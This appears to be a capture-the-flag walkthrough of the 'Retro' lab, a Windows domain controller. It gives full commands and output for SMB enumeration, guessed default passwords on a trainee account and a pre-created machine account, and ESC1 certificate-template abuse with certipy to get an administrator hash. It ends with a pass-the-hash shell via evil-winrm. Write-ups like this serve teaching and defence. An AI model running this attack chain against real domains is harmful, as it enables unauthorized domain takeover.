Nmap
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ nmap -sC -sV -Pn 10.129.234.44 -oN ./nmap.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-06 22:40 UTC
Nmap scan report for 10.129.234.44
Host is up (0.30s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-06 11:41:48Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: 2025-10-06T11:43:24+00:00; -10h58m57s from scanner time.
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.retro.vl
| Not valid before: 2024-10-02T10:33:09
|_Not valid after: 2025-10-02T10:33:09
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.retro.vl
| Not valid before: 2024-10-02T10:33:09
|_Not valid after: 2025-10-02T10:33:09
|_ssl-date: 2025-10-06T11:43:23+00:00; -10h58m57s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: 2025-10-06T11:43:24+00:00; -10h58m57s from scanner time.
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.retro.vl
| Not valid before: 2024-10-02T10:33:09
|_Not valid after: 2025-10-02T10:33:09
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.retro.vl
| Not valid before: 2024-10-02T10:33:09
|_Not valid after: 2025-10-02T10:33:09
|_ssl-date: 2025-10-06T11:43:23+00:00; -10h58m57s from scanner time.
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-10-06T11:43:23+00:00; -10h58m57s from scanner time.
| rdp-ntlm-info:
| Target_Name: RETRO
| NetBIOS_Domain_Name: RETRO
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: retro.vl
| DNS_Computer_Name: DC.retro.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-10-06T11:42:38+00:00
| ssl-cert: Subject: commonName=DC.retro.vl
| Not valid before: 2025-10-05T11:36:50
|_Not valid after: 2026-04-06T11:36:50
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -10h58m58s, deviation: 2s, median: -10h58m57s
| smb2-time:
| date: 2025-10-06T11:42:40
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 113.95 seconds
Add DNS:DC.retro.vlto our /etc/hosts
SMB
I would start with SMB service with the guest account
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ netexec smb 10.129.234.44 -u guest -p ''
SMB 10.129.234.44 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.129.234.44 445 DC [+] retro.vl\guest:
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ netexec smb 10.129.234.44 -u guest -p '' --shares
SMB 10.129.234.44 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.129.234.44 445 DC [+] retro.vl\guest:
SMB 10.129.234.44 445 DC [*] Enumerated shares
SMB 10.129.234.44 445 DC Share Permissions Remark
SMB 10.129.234.44 445 DC ----- ----------- ------
SMB 10.129.234.44 445 DC ADMIN$ Remote Admin
SMB 10.129.234.44 445 DC C$ Default share
SMB 10.129.234.44 445 DC IPC$ READ Remote IPC
SMB 10.129.234.44 445 DC NETLOGON Logon server share
SMB 10.129.234.44 445 DC Notes
SMB 10.129.234.44 445 DC SYSVOL Logon server share
SMB 10.129.234.44 445 DC Trainees READ
Traineesshare would be our target.
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ smbclient //dc.retro.vl/Trainees -U 'guest%'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sun Jul 23 21:58:43 2023
.. DHS 0 Wed Jun 11 14:17:10 2025
Important.txt A 288 Sun Jul 23 22:00:13 2023
4659711 blocks of size 4096. 1307773 blocks available
smb: \> get Important.txt
getting file \Important.txt of size 288 as Important.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ cat Important.txt
Dear Trainees,
I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.
Regards
The Admins
That hints us to check all the users
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ netexec smb 10.129.234.44 -u guest -p '' --users
SMB 10.129.234.44 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.129.234.44 445 DC [+] retro.vl\guest:
But we can't read anything, so let's try RIDcycle
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ netexec smb dc.retro.vl -u guest -p '' --rid-brute
SMB 10.129.234.44 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.129.234.44 445 DC [+] retro.vl\guest:
SMB 10.129.234.44 445 DC 498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.234.44 445 DC 500: RETRO\Administrator (SidTypeUser)
SMB 10.129.234.44 445 DC 501: RETRO\Guest (SidTypeUser)
SMB 10.129.234.44 445 DC 502: RETRO\krbtgt (SidTypeUser)
SMB 10.129.234.44 445 DC 512: RETRO\Domain Admins (SidTypeGroup)
SMB 10.129.234.44 445 DC 513: RETRO\Domain Users (SidTypeGroup)
SMB 10.129.234.44 445 DC 514: RETRO\Domain Guests (SidTypeGroup)
SMB 10.129.234.44 445 DC 515: RETRO\Domain Computers (SidTypeGroup)
SMB 10.129.234.44 445 DC 516: RETRO\Domain Controllers (SidTypeGroup)
SMB 10.129.234.44 445 DC 517: RETRO\Cert Publishers (SidTypeAlias)
SMB 10.129.234.44 445 DC 518: RETRO\Schema Admins (SidTypeGroup)
SMB 10.129.234.44 445 DC 519: RETRO\Enterprise Admins (SidTypeGroup)
SMB 10.129.234.44 445 DC 520: RETRO\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.234.44 445 DC 521: RETRO\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.234.44 445 DC 522: RETRO\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.234.44 445 DC 525: RETRO\Protected Users (SidTypeGroup)
SMB 10.129.234.44 445 DC 526: RETRO\Key Admins (SidTypeGroup)
SMB 10.129.234.44 445 DC 527: RETRO\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.234.44 445 DC 553: RETRO\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.234.44 445 DC 571: RETRO\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.234.44 445 DC 572: RETRO\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.234.44 445 DC 1000: RETRO\DC$ (SidTypeUser)
SMB 10.129.234.44 445 DC 1101: RETRO\DnsAdmins (SidTypeAlias)
SMB 10.129.234.44 445 DC 1102: RETRO\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.234.44 445 DC 1104: RETRO\trainee (SidTypeUser)
SMB 10.129.234.44 445 DC 1106: RETRO\BANKING$ (SidTypeUser)
SMB 10.129.234.44 445 DC 1107: RETRO\jburley (SidTypeUser)
SMB 10.129.234.44 445 DC 1108: RETRO\HelpDesk (SidTypeGroup)
SMB 10.129.234.44 445 DC 1109: RETRO\tblack (SidTypeUser)
There’s a trainee user, which is likely what the note was referring to.
I would also focus on account RETRO\BANKING$ (SidTypeUser)which looks like a machine account.
From the message from admin, i guess the password of traineewould be the account name.
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ netexec smb dc.retro.vl -u trainee -p trainee
SMB 10.129.234.44 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.129.234.44 445 DC [+] retro.vl\trainee:trainee
Now we can use this credit to check SMB again
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ netexec smb dc.retro.vl -u trainee -p trainee --shares
SMB 10.129.234.44 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.129.234.44 445 DC [+] retro.vl\trainee:trainee
SMB 10.129.234.44 445 DC [*] Enumerated shares
SMB 10.129.234.44 445 DC Share Permissions Remark
SMB 10.129.234.44 445 DC ----- ----------- ------
SMB 10.129.234.44 445 DC ADMIN$ Remote Admin
SMB 10.129.234.44 445 DC C$ Default share
SMB 10.129.234.44 445 DC IPC$ READ Remote IPC
SMB 10.129.234.44 445 DC NETLOGON READ Logon server share
SMB 10.129.234.44 445 DC Notes READ
SMB 10.129.234.44 445 DC SYSVOL READ Logon server share
SMB 10.129.234.44 445 DC Trainees READ
Now there is another share Notescan be visited
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ smbclient //dc.retro.vl/Notes -U 'trainee%trainee'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Apr 9 03:12:49 2025
.. DHS 0 Wed Jun 11 14:17:10 2025
ToDo.txt A 248 Sun Jul 23 22:05:56 2023
user.txt A 32 Wed Apr 9 03:13:01 2025
4659711 blocks of size 4096. 1325651 blocks available
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ cat ToDo.txt
Thomas,
after convincing the finance department to get rid of their ancienct banking software
it is finally time to clean up the mess they made. We should start with the pre created
computer account. That one is older than me.
Best
James
Shell as BANKING$
I noticed there is an additional computer in the domain above, it's name is BANKING$
I guess its password would be bankingor Banking
Let's have a try
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ netexec smb dc.retro.vl -u 'BANKING$' -p banking
SMB 10.129.234.44 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.129.234.44 445 DC [-] retro.vl\BANKING$:banking STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT
You will see the error message STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT when you have guessed the correct password for a computer account that has not been used yet.
Now let's try to change its password
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ changepasswd.py -newpass wither123. 'retro.vl/BANKING$:banking@dc.retro.vl'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Changing the password of retro.vl\BANKING$
[*] Connecting to DCE/RPC as retro.vl\BANKING$
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 280, in login
return self._SMBConnection.login(user, password, domain, lmhash, nthash)
~~~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 1092, in login
if packet.isValidAnswer(STATUS_SUCCESS):
~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/impacket/smb3structs.py", line 460, in isValidAnswer
raise smb3.SessionError(self['Status'], self)
impacket.smb3.SessionError: SMB SessionError: STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT(The account used is a computer account. Use your global user account or local user account to access this server.)
But it give us the error, smb would not worked here.We can try to use RPC protocol
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ changepasswd.py -newpass wither123. 'retro.vl/BANKING$:banking@dc.retro.vl' -protocol rpc-samr
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Changing the password of retro.vl\BANKING$
[*] Connecting to DCE/RPC as retro.vl\BANKING$
[*] Password was changed successfully.
It worked and we can verify it
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ netexec smb dc.retro.vl -u 'BANKING$' -p wither123.
SMB 10.129.234.44 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.129.234.44 445 DC [+] retro.vl\BANKING$:wither123.
Or you can just use Kerberos Auth
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ netexec smb dc.retro.vl -u 'BANKING$' -p banking -k
SMB dc.retro.vl 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB dc.retro.vl 445 DC [+] retro.vl\BANKING$:banking
Privilege escalation
BANKING$ has the same SMB access permissions as Trainee. I can't get a shell via winrm.
I would continue to check ADCS
I have use certipyto list all the vulnerable templates:
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ certipy-ad find -u 'BANKING$@retro.vl' -p wither123. -vulnerable -stdout
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The DNS query name does not exist: RETRO.VL.
[!] Use -debug to print a stacktrace
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[!] DNS resolution failed: The DNS query name does not exist: DC.retro.vl.
[!] Use -debug to print a stacktrace
[*] Retrieving CA configuration for 'retro-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'retro-DC-CA'
[*] Checking web enrollment for CA 'retro-DC-CA' @ 'DC.retro.vl'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : retro-DC-CA
DNS Name : DC.retro.vl
Certificate Subject : CN=retro-DC-CA, DC=retro, DC=vl
Certificate Serial Number : 7A107F4C115097984B35539AA62E5C85
Certificate Validity Start : 2023-07-23 21:03:51+00:00
Certificate Validity End : 2028-07-23 21:13:50+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : RETRO.VL\Administrators
Access Rights
ManageCa : RETRO.VL\Administrators
RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
ManageCertificates : RETRO.VL\Administrators
RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Enroll : RETRO.VL\Authenticated Users
Certificate Templates
0
Template Name : RetroClients
Display Name : Retro Clients
Certificate Authorities : retro-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Extended Key Usage : Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 4096
Template Created : 2023-07-23T21:17:47+00:00
Template Last Modified : 2023-07-23T21:18:39+00:00
Permissions
Enrollment Permissions
Enrollment Rights : RETRO.VL\Domain Admins
RETRO.VL\Domain Computers
RETRO.VL\Enterprise Admins
Object Control Permissions
Owner : RETRO.VL\Administrator
Full Control Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Write Owner Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Write Dacl Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Write Property Enroll : RETRO.VL\Domain Admins
RETRO.VL\Domain Computers
RETRO.VL\Enterprise Admins
[+] User Enrollable Principals : RETRO.VL\Domain Computers
[!] Vulnerabilities
ESC1 : Enrollee supplies subject and template allows client authentication.
It is vulnerable to ESC1.
Let's exploit step by step Firstly, request a administrator certificate
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ sudo ntpdate retro.vl
2025-10-06 12:18:11.715839 (+0000) -39328.431598 +/- 0.157972 retro.vl 10.129.234.44 s1 no-leap
CLOCK: time stepped by -39328.431598
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ certipy-ad req -u 'BANKING$@retro.vl' -p wither123. -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The DNS query name does not exist: RETRO.VL.
[!] Use -debug to print a stacktrace
[*] Requesting certificate via RPC
[*] Request ID is 9
[-] Got error while requesting certificate: code: 0x80094811 - CERTSRV_E_KEY_LENGTH - The public key does not meet the minimum size required by the specified certificate template.
Would you like to save the private key? (y/N): y
[*] Saving private key to '9.key'
[*] Wrote private key to '9.key'
[-] Failed to request certificate
It gives the error message, said public key does not meet the minimum size.So let's add this setting
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ certipy-ad req -u 'BANKING$@retro.vl' -p wither123. -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl -key-size 4096
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The DNS query name does not exist: RETRO.VL.
[!] Use -debug to print a stacktrace
[*] Requesting certificate via RPC
[*] Request ID is 10
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@retro.vl'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
Then we can use this certificate to auth as administrator
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ certipy-ad auth -pfx administrator.pfx -dc-ip 10.129.234.44
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@retro.vl'
[*] Using principal: 'administrator@retro.vl'
[*] Trying to get TGT...
[-] Object SID mismatch between certificate and user 'administrator'
[-] See the wiki for more information
This fails too. It says there’s a SID mismatch. We have to giving the SID.
We can use lookupsid.pyto get the SID or use Bloodhoundto collect the data
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ lookupsid.py retro.vl/BANKING$:wither123.@dc.retro.vl
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Brute forcing SIDs at dc.retro.vl
[*] StringBinding ncacn_np:dc.retro.vl[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2983547755-698260136-4283918172
498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: RETRO\Administrator (SidTypeUser)
501: RETRO\Guest (SidTypeUser)
502: RETRO\krbtgt (SidTypeUser)
512: RETRO\Domain Admins (SidTypeGroup)
513: RETRO\Domain Users (SidTypeGroup)
514: RETRO\Domain Guests (SidTypeGroup)
515: RETRO\Domain Computers (SidTypeGroup)
516: RETRO\Domain Controllers (SidTypeGroup)
517: RETRO\Cert Publishers (SidTypeAlias)
518: RETRO\Schema Admins (SidTypeGroup)
519: RETRO\Enterprise Admins (SidTypeGroup)
520: RETRO\Group Policy Creator Owners (SidTypeGroup)
521: RETRO\Read-only Domain Controllers (SidTypeGroup)
522: RETRO\Cloneable Domain Controllers (SidTypeGroup)
525: RETRO\Protected Users (SidTypeGroup)
526: RETRO\Key Admins (SidTypeGroup)
527: RETRO\Enterprise Key Admins (SidTypeGroup)
553: RETRO\RAS and IAS Servers (SidTypeAlias)
571: RETRO\Allowed RODC Password Replication Group (SidTypeAlias)
572: RETRO\Denied RODC Password Replication Group (SidTypeAlias)
1000: RETRO\DC$ (SidTypeUser)
1101: RETRO\DnsAdmins (SidTypeAlias)
1102: RETRO\DnsUpdateProxy (SidTypeGroup)
1104: RETRO\trainee (SidTypeUser)
1106: RETRO\BANKING$ (SidTypeUser)
1107: RETRO\jburley (SidTypeUser)
1108: RETRO\HelpDesk (SidTypeGroup)
1109: RETRO\tblack (SidTypeUser)
Now try to request again
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ certipy-ad req -u 'BANKING$@retro.vl' -p wither123. -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl -key-size 4096 -sid S-1-5-21-2983547755-698260136-4283918172-500
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The DNS query name does not exist: RETRO.VL.
[!] Use -debug to print a stacktrace
[*] Requesting certificate via RPC
[*] Request ID is 12
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@retro.vl'
[*] Certificate object SID is 'S-1-5-21-2983547755-698260136-4283918172-500'
[*] Saving certificate and private key to 'administrator.pfx'
File 'administrator.pfx' already exists. Overwrite? (y/n - saying no will save with a unique filename): y
[*] Wrote certificate and private key to 'administrator.pfx'
Then authas administrator
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@retro.vl'
[*] SAN URL SID: 'S-1-5-21-2983547755-698260136-4283918172-500'
[*] Security Extension SID: 'S-1-5-21-2983547755-698260136-4283918172-500'
[*] Using principal: 'administrator@retro.vl'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@retro.vl': aad3b435b51404eeaad3b435b51404ee:252fac7066d93dd009d4fd2cd0368389
We can use this hash to evil-winrmto get the shell
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/Retro]
└─$ evil-winrm -i dc.retro.vl -u administrator -H 252fac7066d93dd009d4fd2cd0368389
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
retro\administrator
Description
"Retro" is an Easy Windows machine that exposes an Active Directory Domain Controller. Access to the system was gained through SMB enumeration and exploitation of a pre-created machine account. This was achieved by exploiting Active Directory Certificate Services, specifically using the "ESC1" attack (which involves impersonating an administrative user using a certificate template).